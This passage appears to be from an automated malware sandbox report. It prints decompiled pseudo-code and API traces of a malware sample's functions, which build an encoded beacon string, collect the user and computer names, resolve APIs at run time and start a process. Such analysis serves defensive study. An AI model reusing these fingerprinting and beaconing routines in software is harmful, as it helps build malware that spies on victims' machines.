wsprintfA.USER32 ref: 02BD4508
wsprintfA.USER32 ref: 02BD4525
wsprintfA.USER32 ref: 02BD4548
HeapFree.KERNEL32(00000000,00000000), ref: 02BD4558
wsprintfA.USER32 ref: 02BD457A
HeapFree.KERNEL32(00000000,00000000), ref: 02BD458A
wsprintfA.USER32 ref: 02BD45C1
wsprintfA.USER32 ref: 02BD45E1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD45FE
GetTickCount.KERNEL32 ref: 02BD460E
RtlEnterCriticalSection.NTDLL(06749570), ref: 02BD4622
RtlLeaveCriticalSection.NTDLL(06749570), ref: 02BD4640

Part of subcall function 02BD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD4653,?,067495B0), ref: 02BD199F
Part of subcall function 02BD1974: lstrlen.KERNEL32(?,?,?,02BD4653,?,067495B0), ref: 02BD19A7
Part of subcall function 02BD1974: strcpy.NTDLL ref: 02BD19BE
Part of subcall function 02BD1974: lstrcat.KERNEL32(00000000,?), ref: 02BD19C9
Part of subcall function 02BD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD4653,?,067495B0), ref: 02BD19E6

StrTrimA.SHLWAPI(00000000,02BDC2AC,?,067495B0), ref: 02BD4672

Part of subcall function 02BD38CA: lstrlen.KERNEL32(06749AF0,00000000,00000000,7691C740,02BD467E,00000000), ref: 02BD38DA
Part of subcall function 02BD38CA: lstrlen.KERNEL32(?), ref: 02BD38E2
Part of subcall function 02BD38CA: lstrcpy.KERNEL32(00000000,06749AF0), ref: 02BD38F6
Part of subcall function 02BD38CA: lstrcat.KERNEL32(00000000,?), ref: 02BD3901

lstrcpy.KERNEL32(00000000,?), ref: 02BD4691
lstrcpy.KERNEL32(00000000,00000000), ref: 02BD4698
lstrcat.KERNEL32(00000000,?), ref: 02BD46A5
lstrcat.KERNEL32(00000000,00000000), ref: 02BD46A9
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02BD46D9
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD46E8
HeapFree.KERNEL32(00000000,00000000,?,067495B0), ref: 02BD46F7
HeapFree.KERNEL32(00000000,00000000), ref: 02BD4709
HeapFree.KERNEL32(00000000,?), ref: 02BD4718

Strings

Ut, xrefs: 02BD4558, 02BD458A, 02BD46D9, 02BD46E8, 02BD46F7, 02BD4709, 02BD4718

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
String ID: Ut
API String ID: 3963266935-8415677
Opcode ID: f293e09ab83bd69b30de1188d9ba0a578f2ad92c9139ae16cfdf88c393d565b3
Instruction ID: 5a823d17f407b27cdb401c286c6bdb4699c07799ac4bd37e4824c131c04dfc42
Opcode Fuzzy Hash: f293e09ab83bd69b30de1188d9ba0a578f2ad92c9139ae16cfdf88c393d565b3
Instruction Fuzzy Hash: 5361C072982202AFC7219B64DC64FD63BB8FB48394F050825F989C7151F735E926CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02BD6109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02BD6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2bdd018; // 0x6a85f48
				asm("bswap eax");
				_t61 =  *0x2bdd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2bdd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2bdd00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x2bdd2e0; // 0x3b6a5a8
				_t3 = _t64 + 0x2bde633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x2bdd02c,  *0x2bdd004, _t59);
				_t67 = E02BD5B60();
				_t68 =  *0x2bdd2e0; // 0x3b6a5a8
				_t4 = _t68 + 0x2bde673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E02BD1BBF(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2bdd2e0; // 0x3b6a5a8
					_t7 = _t126 + 0x2bde8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2bdd270, 0, _v8);
				}
				_t73 = E02BD137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2bdd2e0; // 0x3b6a5a8
					_t11 = _t121 + 0x2bde8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2bdd270, 0, _v8);
				}
				_t146 =  *0x2bdd364; // 0x67495b0
				_t75 = E02BD3857(0x2bdd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x2bdd270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2bdd270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2bdd270, _t152, _v20);
						goto L26;
					}
					E02BDA811(GetTickCount());
					_t82 =  *0x2bdd364; // 0x67495b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2bdd364; // 0x67495b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2bdd364; // 0x67495b0
					_t148 = E02BD1974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2bdd270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2bdc2ac);
					_push(_t148);
					_t94 = E02BD38CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2bdd270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02BD1922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02BD47D5();
						L22:
						HeapFree( *0x2bdd270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02BD365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E02BD3273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02BD4AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02BD8FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02BD4AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02bd6109
0x02bd6109
0x02bd6109
0x02bd6112
0x02bd611b
0x02bd611d
0x02bd611d
0x02bd612a
0x02bd6135
0x02bd6138
0x02bd613d
0x02bd6146
0x02bd6149
0x02bd614e
0x02bd6151
0x02bd6156
0x02bd6159
0x02bd6165
0x02bd6172
0x02bd6174
0x02bd617a
0x02bd617f
0x02bd618a
0x02bd618c
0x02bd618f
0x02bd6191
0x02bd6196
0x02bd619c
0x02bd61a1
0x02bd61a4
0x02bd61a9
0x02bd61b6
0x02bd61b8
0x02bd61be
0x02bd61c8
0x02bd61c8
0x02bd61ca
0x02bd61cf
0x02bd61d4
0x02bd61d7
0x02bd61dc
0x02bd61e9
0x02bd61eb
0x02bd61f9
0x02bd61f9
0x02bd61fb
0x02bd6209
0x02bd620e
0x02bd6210
0x02bd6215
0x02bd63d6
0x02bd63e0
0x02bd63e9
0x02bd621b
0x02bd6227
0x02bd622d
0x02bd6232
0x02bd63ca
0x02bd63d4
0x00000000
0x02bd63d4
0x02bd623e
0x02bd6243
0x02bd624c
0x02bd625d
0x02bd6261
0x02bd626a
0x02bd6270
0x02bd627f
0x02bd6286
0x02bd628f
0x02bd6295
0x02bd63be
0x02bd63c8
0x00000000
0x02bd63c8
0x02bd62a1
0x02bd62a7
0x02bd62a8
0x02bd62ad
0x02bd62b2
0x02bd63b4
0x02bd63bc
0x00000000
0x02bd63bc
0x02bd62bb
0x02bd62c2
0x02bd62ca
0x02bd62cf
0x02bd62d8
0x02bd62e3
0x02bd62e8
0x02bd62ed
0x02bd63ec
0x02bd63a0
0x02bd63a0
0x02bd63a5
0x02bd63b0
0x02bd63b2
0x00000000
0x02bd63b2
0x02bd62f7
0x02bd62fc
0x02bd6301
0x02bd6306
0x02bd6316
0x02bd6319
0x02bd631f
0x02bd6325
0x02bd632b
0x02bd632e
0x02bd6334
0x02bd6337
0x02bd633c
0x02bd6340
0x02bd6340
0x02bd634c
0x02bd6358
0x02bd635c
0x02bd635e
0x02bd6363
0x02bd6365
0x02bd636a
0x02bd636f
0x02bd637c
0x02bd6384
0x02bd6387
0x02bd6387
0x02bd6363
0x00000000
0x02bd634e
0x02bd6352
0x02bd6389
0x02bd638c
0x02bd6395
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd6395
0x02bd6354
0x00000000
0x02bd6354
0x02bd634c

APIs

GetTickCount.KERNEL32 ref: 02BD611D
wsprintfA.USER32 ref: 02BD616D
wsprintfA.USER32 ref: 02BD618A
wsprintfA.USER32 ref: 02BD61B6
HeapFree.KERNEL32(00000000,?), ref: 02BD61C8
wsprintfA.USER32 ref: 02BD61E9
HeapFree.KERNEL32(00000000,?), ref: 02BD61F9
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD6227
GetTickCount.KERNEL32 ref: 02BD6238
RtlEnterCriticalSection.NTDLL(06749570), ref: 02BD624C
RtlLeaveCriticalSection.NTDLL(06749570), ref: 02BD626A

Part of subcall function 02BD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD4653,?,067495B0), ref: 02BD199F
Part of subcall function 02BD1974: lstrlen.KERNEL32(?,?,?,02BD4653,?,067495B0), ref: 02BD19A7
Part of subcall function 02BD1974: strcpy.NTDLL ref: 02BD19BE
Part of subcall function 02BD1974: lstrcat.KERNEL32(00000000,?), ref: 02BD19C9
Part of subcall function 02BD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD4653,?,067495B0), ref: 02BD19E6

StrTrimA.SHLWAPI(00000000,02BDC2AC,?,067495B0), ref: 02BD62A1

Part of subcall function 02BD38CA: lstrlen.KERNEL32(06749AF0,00000000,00000000,7691C740,02BD467E,00000000), ref: 02BD38DA
Part of subcall function 02BD38CA: lstrlen.KERNEL32(?), ref: 02BD38E2
Part of subcall function 02BD38CA: lstrcpy.KERNEL32(00000000,06749AF0), ref: 02BD38F6
Part of subcall function 02BD38CA: lstrcat.KERNEL32(00000000,?), ref: 02BD3901

lstrcpy.KERNEL32(00000000,?), ref: 02BD62C2
lstrcpy.KERNEL32(?,?), ref: 02BD62CA
lstrcat.KERNEL32(?,?), ref: 02BD62D8
lstrcat.KERNEL32(?,00000000), ref: 02BD62DE

Part of subcall function 02BD1922: lstrlen.KERNEL32(?,00000000,06749B10,00000000,02BD74FF,06749CEE,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD1929
Part of subcall function 02BD1922: mbstowcs.NTDLL ref: 02BD1952
Part of subcall function 02BD1922: memset.NTDLL ref: 02BD1964

wcstombs.NTDLL ref: 02BD636F

Part of subcall function 02BD3273: SysAllocString.OLEAUT32(?), ref: 02BD32AE

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

HeapFree.KERNEL32(00000000,?,?), ref: 02BD63B0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD63BC
HeapFree.KERNEL32(00000000,?,?,067495B0), ref: 02BD63C8
HeapFree.KERNEL32(00000000,?), ref: 02BD63D4
HeapFree.KERNEL32(00000000,?), ref: 02BD63E0

Strings

Ut, xrefs: 02BD6196

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 3748877296-8415677
Opcode ID: 445e3e6f38a808b61dbe2c24ef7b6b65494382ada89b0ac960373b05920a2a4f
Instruction ID: ecd28da7f901c7287dc21249bf878d00b5285afe1389c0a1e1e94313bc60a23c
Opcode Fuzzy Hash: 445e3e6f38a808b61dbe2c24ef7b6b65494382ada89b0ac960373b05920a2a4f
Instruction Fuzzy Hash: 3C914972D41209AFCB119FA8DC58AEE7BB9FF48390F1488A5E448D7250E731E961DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02BD1000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02BD4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02BDA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2bdd298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2bdd2e0; // 0x3b6a5a8
					_t18 = _t47 + 0x2bde3b3; // 0x73797325
					_t68 = E02BD2291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2bdd2e0; // 0x3b6a5a8
						_t19 = _t50 + 0x2bde760; // 0x6748d08
						_t20 = _t50 + 0x2bde0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02BD34C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02BD34C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2bdd270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02BD4AAB(_t70);
				goto L12;
			}

0x02bd1008
0x02bd1008
0x02bd1017
0x02bd101e
0x02bd1023
0x02bd1130
0x02bd1137
0x02bd1137
0x02bd1032
0x02bd103a
0x02bd103d
0x02bd1042
0x02bd1057
0x02bd105d
0x02bd105e
0x02bd1061
0x02bd1067
0x02bd106a
0x02bd106f
0x02bd1077
0x02bd1083
0x02bd1087
0x02bd1117
0x02bd108d
0x02bd108d
0x02bd1092
0x02bd1099
0x02bd10ad
0x02bd10b1
0x02bd1100
0x02bd10b3
0x02bd10b4
0x02bd10bb
0x02bd10d4
0x02bd10d6
0x02bd10da
0x02bd10e1
0x02bd10fb
0x02bd10e3
0x02bd10ec
0x02bd10f1
0x02bd10f1
0x02bd10e1
0x02bd110f
0x02bd110f
0x02bd1087
0x02bd111e
0x02bd1127
0x02bd112b
0x00000000

APIs

Part of subcall function 02BD4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD101C,?,00000001,?,?,00000000,00000000), ref: 02BD485C
Part of subcall function 02BD4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD487E
Part of subcall function 02BD4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD4894
Part of subcall function 02BD4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD48AA
Part of subcall function 02BD4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD48C0
Part of subcall function 02BD4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD48D6

memset.NTDLL ref: 02BD106A

Part of subcall function 02BD2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD1083,73797325), ref: 02BD22A2
Part of subcall function 02BD2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD22BC

GetModuleHandleA.KERNEL32(4E52454B,06748D08,73797325), ref: 02BD10A0
GetProcAddress.KERNEL32(00000000), ref: 02BD10A7
HeapFree.KERNEL32(00000000,00000000), ref: 02BD110F

Part of subcall function 02BD34C7: GetProcAddress.KERNEL32(36776F57,02BD5B13), ref: 02BD34E2

CloseHandle.KERNEL32(00000000,00000001), ref: 02BD10EC
CloseHandle.KERNEL32(?), ref: 02BD10F1
GetLastError.KERNEL32(00000001), ref: 02BD10F5

Strings

@MtNt, xrefs: 02BD10F5
Ut, xrefs: 02BD110F

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Ut$@MtNt
API String ID: 3075724336-969920318
Opcode ID: fa327595bad32961afbeeea45c9b107c22e52fb6dada8de162d287e6acd8ac88
Instruction ID: b61cf7d07821fb277680a90416d20c4921206a1b263ea2bccb410de1b7618be3
Opcode Fuzzy Hash: fa327595bad32961afbeeea45c9b107c22e52fb6dada8de162d287e6acd8ac88
Instruction Fuzzy Hash: BC314DB6C41209AFDB11AFE4CC89EDEBBBDEB08344F0548A9E645E7110E734AA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5F64, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02BD5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2bdd37c; // 0x6749818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02BD3A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2bdc1ac;
				}
				_t46 = E02BD51DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02BD75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2bdd2e0; // 0x3b6a5a8
						_t16 = _t75 + 0x2bdeb10; // 0x530025
						 *0x2bdd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02BD3A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2bdc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02BD75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02BD4AAB(_v20);
						} else {
							_t66 =  *0x2bdd2e0; // 0x3b6a5a8
							_t31 = _t66 + 0x2bdec30; // 0x73006d
							 *0x2bdd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02BD4AAB(_v12);
				}
				return _v24;
			}

0x02bd5f6c
0x02bd5f72
0x02bd5f79
0x02bd5f7f
0x02bd5f83
0x02bd5f87
0x02bd5f8a
0x02bd5f8f
0x02bd5f94
0x02bd5f96
0x02bd5f96
0x02bd5f9f
0x02bd5fa4
0x02bd5fa9
0x02bd5faf
0x02bd5fb9
0x02bd5fc2
0x02bd5fc9
0x02bd5fe2
0x02bd5fe7
0x02bd5fec
0x02bd5ff5
0x02bd5ffe
0x02bd600f
0x02bd6018
0x02bd601c
0x02bd6020
0x02bd6025
0x02bd602a
0x02bd602c
0x02bd602c
0x02bd6036
0x02bd603f
0x02bd6046
0x02bd605e
0x02bd6062
0x02bd609f
0x02bd6064
0x02bd6067
0x02bd606f
0x02bd6080
0x02bd608c
0x02bd6094
0x02bd6098
0x02bd6098
0x02bd6062
0x02bd60a7
0x02bd60ac
0x02bd60b3

APIs

GetTickCount.KERNEL32 ref: 02BD5F79
lstrlen.KERNEL32(?,80000002,00000005), ref: 02BD5FB9
lstrlen.KERNEL32(00000000), ref: 02BD5FC2
lstrlen.KERNEL32(00000000), ref: 02BD5FC9
lstrlenW.KERNEL32(80000002), ref: 02BD5FD6
lstrlen.KERNEL32(?,00000004), ref: 02BD6036
lstrlen.KERNEL32(?), ref: 02BD603F
lstrlen.KERNEL32(?), ref: 02BD6046
lstrlenW.KERNEL32(?), ref: 02BD604D

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 4e6a0668962d71b0221d39cc979043325b6c76ed00418b5e2d0099ea49ffa8a6
Instruction ID: 75fbda19fef29ed9900686ca2e7b9b1e4460174c635ade0edacc7798f612f8b5
Opcode Fuzzy Hash: 4e6a0668962d71b0221d39cc979043325b6c76ed00418b5e2d0099ea49ffa8a6
Instruction Fuzzy Hash: FD416772D0021AEBCF11AFA4DC44ADEBBB5EF44348F054495E904A7211EB329A61EF94

Uniqueness

Uniqueness Score: -1.00%

Function 02BD137A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02BD75F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02BD4AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2bd4565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02bd1388
0x02bd138b
0x02bd138e
0x02bd1394
0x02bd1399
0x02bd139f
0x02bd13a7
0x02bd13aa
0x02bd13b0
0x02bd13b5
0x02bd13c2
0x02bd13cf
0x02bd13d3
0x02bd13d5
0x02bd13d9
0x02bd13dc
0x02bd13ec
0x02bd143f
0x02bd1440
0x02bd13ee
0x02bd13f3
0x02bd13f4
0x02bd13f9
0x02bd13fc
0x02bd140f
0x00000000
0x02bd1411
0x02bd1414
0x02bd1419
0x02bd1427
0x02bd142a
0x02bd1430
0x02bd1435
0x00000000
0x02bd1437
0x02bd1437
0x02bd143a
0x02bd143a
0x02bd1435
0x02bd140f
0x02bd1445
0x02bd1446
0x02bd13b5
0x02bd144c

APIs

GetUserNameW.ADVAPI32(00000000,02BD4563), ref: 02BD138E
GetComputerNameW.KERNEL32(00000000,02BD4563), ref: 02BD13AA

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

GetUserNameW.ADVAPI32(00000000,02BD4563), ref: 02BD13E4
GetComputerNameW.KERNEL32(02BD4563,?), ref: 02BD1407
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BD4563,00000000,02BD4565,00000000,00000000,?,?,02BD4563), ref: 02BD142A

Strings

@ht, xrefs: 02BD142A

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

